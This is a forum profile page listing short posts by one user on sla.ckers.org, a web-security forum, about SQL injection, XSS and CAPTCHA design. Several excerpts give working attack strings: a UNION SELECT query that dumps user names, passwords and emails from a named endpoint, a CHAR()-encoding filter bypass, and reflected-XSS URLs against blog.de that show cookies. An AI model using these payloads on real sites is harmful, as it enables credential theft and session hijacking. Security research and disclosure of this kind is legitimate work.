sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How robots and spiders are causing issues, how to stop them. We can also talk about Completely Automated Public Turing Test To Tell Computers And Humans Apart - their use, their compliance issues, porn proxies, PWNtcha and other ways to defeat them. 

Current Page: 1 of 1
Results 1 - 18 of 18
3 years ago
The-Wildcat
hm, it's also exploitable in FF3 but only with a click on the pager. In FF4, is it exploitable without user interaction? If so, how?^^
Forum: XSS Info
6 years ago
The-Wildcat
Hm, first of all read this: http://websec.wordpress.com/2007/11/17/mysql-into-outfile/ You need the FILE right, the full path to the file, mysql needs read rights to the file and the file size must be smaller than max_allowed_packet, otherwise mysql would not read the file. In case of "file not found" mysql4 responds ERROR 13 (HY000): Can't get stat of 'filepath' (Errcode: 2) Without FIL
Forum: SQL and Code Injection
6 years ago
The-Wildcat
That's right, only INTO is possible or INTO @varname
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Hehe I like this paranoid stuff ;) So you can use a per page salt (stored in defines or something similar) rather than a per page method. Or combine both of them. Or you can merge 2 (salted or anything else) MD5 substrings to obfuscate the used algorithm or something similar ^^
Forum: Privacy
6 years ago
The-Wildcat
I think the only way is bruteforcing OR any kind like this /dispat.php?dp=-4 UNION SELECT (concat_ws(":",name,password,mail) FROM users LIMIT 1,1),2,3 FROM news /*
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Hehe, the SHOW command didn't work there. It was only a note that mysql 4 has only SHOW commands. But this command doesn't work in SELECT or any other statement.
Forum: SQL and Code Injection
6 years ago
The-Wildcat
So if you try /dispat.php?dp=-4 UNION SELECT "test",2,3 FROM <replace by newstablename or something similar> /* do you see "test" on the page or not? SHOW command is used like described here http://dev.mysql.com/doc/refman/4.1/en/show.html like SHOW COLUMNS FROM mydb.mytable; show the columns from mytable and so on. SHOW GRANTS FOR 'root'@'localhost'; show
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Try WHERE user = CHAR(97,100,109,105,110)
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Hm yeah, that's right, information_schema is only available in MySQL >= 5. MySQL <= 4.1 use SHOW commands, you can't use SHOW commands in UNION statements, that's the problem (or not ;) seeing from a different angle). The datadir issue is a bug, see: http://bugs.mysql.com/bug.php?id=1039 It's fixed in MySQL >= 5 but MySQL 4 is out of lifecycle. In version <= 4.1.11b it is not fixed. In mo
Forum: SQL and Code Injection
6 years ago
The-Wildcat
This could help http://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Tried CONCAT_WS() !? mysql 5 doesn't support comments in keywords like S/**/E/**/LECT and so on.
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Database query failed: Table 'db.BAD_TABLE_NAME' doesn't exist means there is no table like BAD_TABLE_NAME. It's mysql? So look at information_schema.tables (version 5) or so. Interesting for you: http://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/ "friends page" hehe
Forum: SQL and Code Injection
7 years ago
The-Wildcat
http://www.blog.de/login.php?login=%22%3E%3Cscript%3Ealert('omg');%3C/script%3E http://evil.hackademix.net/name.xss/***http://www.blog.de/srv/domains/search.php?domain_name=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3C%2F%73%63%72%69%70%74%3E***content,post http://evil.hackademix.net/name.xss/***http://www.blog.de/srv/company/company.php?p
Forum: Full Disclosure
7 years ago
The-Wildcat
Nice one ;)
Forum: Full Disclosure
7 years ago
The-Wildcat
another alternative would be: click the intercept point of the two white circles (or any other specified color) Is this also easy to solve? http://ent.the-wildcat.de/captcha/alternative.php
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
The-Wildcat
Hm, this captcha isn't good for accessibility, that's true. But you can implement "accessibility" by readjusting the size of the circles.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
The-Wildcat
Hm, that's bad. Here, a little smaller and a lot more circles: http://ent.the-wildcat.de/captcha/index2.php Edit: To protect against bruteforcing by sending mouse coordinates, you can also add a form key
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
The-Wildcat
What about captchas like that: http://ent.the-wildcat.de/captcha/ Click the sectioned circle. Are there any robots to solve this?
Forum: Robots/Spiders/CAPTCHAs, oh my